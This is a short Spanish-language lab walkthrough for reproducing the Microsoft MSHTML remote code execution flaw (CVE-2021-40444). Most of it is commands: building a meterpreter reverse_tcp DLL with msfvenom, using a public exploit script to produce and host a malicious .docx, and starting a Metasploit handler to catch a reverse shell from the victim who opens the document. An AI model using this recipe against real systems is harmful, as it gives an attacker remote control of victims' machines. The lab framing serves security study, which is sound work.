
Un intento de reproducir la vulnerabilidad de ejecución remota de código (RCE) de Microsoft MSHTML utilizando Metasploit Framework.
Un intento de reproducir la vulnerabilidad de ejecución remota de código (RCE) de Microsoft MSHTML utilizando Metasploit Framework.
funciona mejor si no se ejecuta en FlareVM
Clona el repositorio desde https://github.com/lockedbyte/CVE-2021-40444
Prepara la plantilla .dll para ser usada más tarde con msfvenom
msfvenom -p windows/meterpreter/reverse_tcp lhost=<SOURCE_IP> lport=<LISTENING_PORT> -f dll -o template.dll
Copia el template.dll recién producido en la carpeta test/ del repositorio
Otorga permiso de ejecución al template.dll con chmod +x template.dll
Ejecuta el script para procesar el template.dll en output
python3 exploit.py generate ~/test/template.dll http://<SOURCE IP>
El documento será exportado a la carpeta out/ y podemos crear un escuchador en nuestro puerto HTTP (por defecto es 80)
python3 exploit.py host 80
Ejecuta metasploit con
msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost <SOURCE IP>
run
Luego podemos enviar el document.docx a nuestra máquina vulnerable y ejecutar el .docx
Obtendremos respuesta en la terminal de exploit.py y el laboratorio es exitoso si podemos generar una shell reversa de TCP.